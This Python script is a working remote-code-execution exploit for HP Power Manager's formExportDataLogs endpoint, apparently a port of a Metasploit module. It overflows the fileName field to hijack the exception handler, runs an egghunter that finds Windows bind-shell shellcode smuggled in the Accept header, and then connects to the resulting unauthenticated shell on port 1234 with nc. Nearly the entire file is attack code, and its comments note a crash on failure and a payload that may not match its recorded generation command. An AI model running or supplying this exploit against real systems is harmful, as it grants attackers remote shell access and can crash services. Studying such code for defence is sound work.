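#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""HP Power Manager 'formExportDataLogs' fileName buffer overflow (PoC).

Overflows the ``fileName`` form field of ``/goform/formExportDataLogs`` on
HP Power Manager.  The tail of the overflow looks like a classic SEH
overwrite (a short backwards jump followed by a pop/pop/ret gadget address)
that lands execution in an egghunter; the hunter walks memory for the tag
``b33fb33f`` and jumps to a bind-shell payload that is smuggled in raw
through the ``Accept`` request header.  After a delay the script hands the
terminal to ``nc`` connected to that bind shell.

Based on the Metasploit module
``exploit/windows/http/hp_power_manager_filename``.

Original author: Muhammad Haidari (ghmh@outlook.com, www.github.com/muhammd)
Tested on:       Windows [Version 6.1.7600]

Usage::

    python hpm_exploit.py HOST [HUNT_DELAY_SECONDS]

Operational caveats - read before firing:

* The payload is an *unauthenticated* bind shell on TCP/1234.  Once it is
  up, anyone who can reach the target can use it.  Lab use only; terminate
  the shell (and the process) when you are done.
* The overflow corrupts the service's exception-handler chain.  If the hunt
  does not find the egg, expect the service to crash rather than spawn a
  shell (i.e. this is a denial of service on failure).
* The egghunter needs time to scan the process.  If no shell appears after
  the default 30 s, re-run with a longer delay; the original note suggested
  60 s.
"""
from __future__ import print_function

import socket
import subprocess
import sys
import time

try:  # Python 3
    from urllib.parse import quote_plus
except ImportError:  # Python 2
    from urllib import quote_plus


BANNER = """
##//#############################################################################################################
##  Vulnerability: HP Power Manager 'formExportDataLogs'   ##  FormExportDataLogs Buffer Overflow             ##
##  Vulnerable Application: HP Power Manager               ##  Based on the Metasploit module                 ##
##  Tested on Windows [Version 6.1.7600]                   ##  exploit/windows/http/hp_power_manager_filename ##
##  Author: Muhammad Haidari                               ##  Spawns a shell in the same window              ##
##  Contact: ghmh@outlook.com                              ##                                                 ##
##  Website: www.github.com/muhammd                        ##                                                 ##
##//#############################################################################################################
##
## Usage: python hpm_exploit.py HOST [HUNT_DELAY_SECONDS]
"""

PORT = 80                 # HP Power Manager web interface
SHELL_PORT = 1234         # port the bind-shell payload listens on (msfvenom LPORT)
DEFAULT_HUNT_DELAY = 30   # seconds to give the egghunter before connecting
CONNECT_TIMEOUT = 10      # seconds; the original had no timeout at all

# Tag the egghunter looks for.  It is the usual doubled tag ("b33f" twice):
# the hunter's own code only contains the tag once, so it cannot match itself.
EGG = b"b33fb33f"

# msfvenom -p windows/shell_bind_tcp LHOST=10.11.0.55 LPORT=1234 EXITFUNC=thread
#   -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed
#   --platform windows -f python
# (command reproduced as recorded; the final escape looks truncated, most
# likely "\x5c").
# NOTE(review): the bytes below open with a non-alphanumeric decoder stub
# (xor ecx,ecx / sub ecx / call $-1 / pop esi / xor [esi+0xe]), which is not
# what x86/alpha_mixed emits - the recorded command probably does not match
# the recorded payload.  If you regenerate it, keep CR/LF (\x0a, \x0d) out:
# the payload travels raw inside an HTTP header line and a line break would
# cut it in half.  It also must not contain NUL.
SHELLCODE = (
    b"\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81"
    b"\x76\x0e\x8e\x4f\xb5\x94\x83\xee\xfc\xe2\xf4\x72\xa7"
    b"\x37\x94\x8e\x4f\xd5\x1d\x6b\x7e\x75\xf0\x05\x1f\x85"
    b"\x1f\xdc\x43\x3e\xc6\x9a\xc4\xc7\xbc\x81\xf8\xff\xb2"
    b"\xbf\xb0\x19\xa8\xef\x33\xb7\xb8\xae\x8e\x7a\x99\x8f"
    b"\x88\x57\x66\xdc\x18\x3e\xc6\x9e\xc4\xff\xa8\x05\x03"
    b"\xa4\xec\x6d\x07\xb4\x45\xdf\xc4\xec\xb4\x8f\x9c\x3e"
    b"\xdd\x96\xac\x8f\xdd\x05\x7b\x3e\x95\x58\x7e\x4a\x38"
    b"\x4f\x80\xb8\x95\x49\x77\x55\xe1\x78\x4c\xc8\x6c\xb5"
    b"\x32\x91\xe1\x6a\x17\x3e\xcc\xaa\x4e\x66\xf2\x05\x43"
    b"\xfe\x1f\xd6\x53\xb4\x47\x05\x4b\x3e\x95\x5e\xc6\xf1"
    b"\xb0\xaa\x14\xee\xf5\xd7\x15\xe4\x6b\x6e\x10\xea\xce"
    b"\x05\x5d\x5e\x19\xd3\x27\x86\xa6\x8e\x4f\xdd\xe3\xfd"
    b"\x7d\xea\xc0\xe6\x03\xc2\xb2\x89\xb0\x60\x2c\x1e\x4e"
    b"\xb5\x94\xa7\x8b\xe1\xc4\xe6\x66\x35\xff\x8e\xb0\x60"
    b"\xfe\x86\x16\xe5\x76\x73\x0f\xe5\xd4\xde\x27\x5f\x9b"
    b"\x51\xaf\x4a\x41\x19\x27\xb7\x94\x8a\x9d\x3c\x72\xe4"
    b"\x5f\xe3\xc3\xe6\x8d\x6e\xa3\xe9\xb0\x60\xc3\xe6\xf8"
    b"\x5c\xac\x71\xb0\x60\xc3\xe6\x3b\x59\xaf\x6f\xb0\x60"
    b"\xc3\x19\x27\xc0\xfa\xc3\x2e\x4a\x41\xe6\x2c\xd8\xf0"
    b"\x8e\xc6\x56\xc3\xd9\x18\x84\x62\xe4\x5d\xec\xc2\x6c"
    b"\xb2\xd3\x53\xca\x6b\x89\x95\x8f\xc2\xf1\xb0\x9e\x89"
    b"\xb5\xd0\xda\x1f\xe3\xc2\xd8\x09\xe3\xda\xd8\x19\xe6"
    b"\xc2\xe6\x36\x79\xab\x08\xb0\x60\x1d\x6e\x01\xe3\xd2"
    b"\x71\x7f\xdd\x9c\x09\x52\xd5\x6b\x5b\xf4\x55\x89\xa4"
    b"\x45\xdd\x32\x1b\xf2\x28\x6b\x5b\x73\xb3\xe8\x84\xcf"
    b"\x4e\x74\xfb\x4a\x0e\xd3\x9d\x3d\xda\xfe\x8e\x1c\x4a"
    b"\x41"
)

# tools/exploit/egghunter.rb -f python
#   -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a'
#   -e b33f -v 'hunter'
# The hunter is URL-encoded into the form body, so its bad-char list is the
# set of bytes that would break form parsing rather than the header.
EGGHUNTER = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"
    b"\x3c\x05\x5a\x74\xef\xb8\x62\x33\x33\x66\x89\xd7"
    b"\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# Layout of the overflowing fileName value (byte offsets):
#   [0, 689)    filler 'A'  (the original wrote this as 721 - len(hunter))
#   [689, 719)  30-byte NOP sled
#   [719, 751)  egghunter
#   [751, 755)  "\xeb\xc2\x90\x90": jmp short -0x3e - from 753 back to 691,
#               i.e. into the NOP sled, which slides into the hunter
#   [755, 758)  "\xd5\x74\x41": pop esi / pop ebx / ret 10 in DevManBE.exe.
#               Only three bytes are sent; the top 0x00 of the address is
#               presumably supplied by the string terminator, which is why
#               this must be the very last thing in the value - TODO confirm.
NSEH_OFFSET = 751
NOP_SLED_LEN = 30
NSEH = b"\xeb\xc2\x90\x90"
SEH_HANDLER = b"\xd5\x74\x41"


def _to_bytes(value):
    """Return *value* as bytes (ASCII-encode text; pass bytes through)."""
    if isinstance(value, bytes):
        return value
    return value.encode("ascii")


def build_overflow(egghunter=EGGHUNTER):
    """Return the ``fileName`` value that overwrites the handler record.

    Args:
        egghunter: hunter stub placed right before the overwritten record.
            Its length is subtracted from the filler so the record offset
            stays fixed regardless of hunter size.
    """
    filler_len = NSEH_OFFSET - NOP_SLED_LEN - len(egghunter)
    return (
        b"\x41" * filler_len
        + b"\x90" * NOP_SLED_LEN
        + egghunter
        + NSEH
        + SEH_HANDLER
    )


def build_form_body(overflow):
    """Return the URL-encoded POST body carrying *overflow* as ``fileName``.

    The remaining fields are the ones the export form normally submits; only
    ``fileName`` is attacker-controlled here.
    """
    body = b"dataFormat=comma&exportto=file&fileName=" + _to_bytes(quote_plus(overflow))
    body += (
        b"&bMonth=03&bDay=12&bYear=2017&eMonth=03&eDay=12&eYear=2017"
        b"&LogType=Application&actionType=1%253B"
    )
    return body


def build_request(host, body, shellcode=SHELLCODE, egg=EGG):
    """Return the raw HTTP/1.1 POST that delivers both stages.

    Args:
        host: target host, used verbatim in ``Host`` and ``Referer``.
        body: form body from :func:`build_form_body`.
        shellcode: second stage, sent raw in the ``Accept`` header behind
            *egg* so the hunter can find it in memory.
        egg: tag prefixed to the shellcode (must match the hunter's tag).
    """
    host_b = _to_bytes(host)
    headers = [
        b"POST /goform/formExportDataLogs HTTP/1.1",
        b"Host: " + host_b,
        b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
        b"Accept: " + egg + shellcode,
        b"Referer: http://" + host_b + b"/Contents/exportLogs.asp?logType=Application",
        b"Content-Type: application/x-www-form-urlencoded",
        b"Content-Length: " + _to_bytes(str(len(body))),
    ]
    return b"\r\n".join(headers) + b"\r\n\r\n" + body


def _connect_shell(host):
    """Hand the terminal to ``nc`` connected to the bind shell on *host*.

    Uses an argument list (no shell), so a hostile or odd ``HOST`` argument
    cannot inject into the command line the way ``os.system`` allowed.
    Returns nc's exit status, or ``None`` if nc could not be started.
    """
    cmd = ["nc", "-nv", host, str(SHELL_PORT)]
    try:
        return subprocess.call(cmd)
    except OSError as exc:
        print("[-] Could not run '%s': %s - connect to %s:%d by hand."
              % (" ".join(cmd), exc, host, SHELL_PORT))
        return None


def main(argv):
    """Entry point: ``HOST [HUNT_DELAY_SECONDS]``.  Returns the exit status."""
    print(BANNER)
    if len(argv) < 2:
        print("Usage: %s HOST [HUNT_DELAY_SECONDS]" % argv[0])
        return 1
    host = argv[1]
    delay = DEFAULT_HUNT_DELAY
    if len(argv) > 2:
        try:
            delay = float(argv[2])
        except ValueError:
            print("HUNT_DELAY_SECONDS must be a number, got %r" % argv[2])
            return 1

    request = build_request(host, build_form_body(build_overflow()))

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.settimeout(CONNECT_TIMEOUT)
        try:
            sock.connect((host, PORT))
            print("[+] Payload Fired... She will be back in less than a min...")
            sock.sendall(request)  # send() may write only part of the request
        except socket.error as exc:
            print("[-] Could not deliver the request to %s:%d: %s" % (host, PORT, exc))
            return 1
        print("[+] Give me %s Sec!" % delay)
        time.sleep(delay)
        # The socket is deliberately kept open until after the shell attempt,
        # matching the original ordering (send, wait, nc, close).
        _connect_shell(host)
    finally:
        sock.close()
    print("[+] Did you get your Proof.txt file?!?")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))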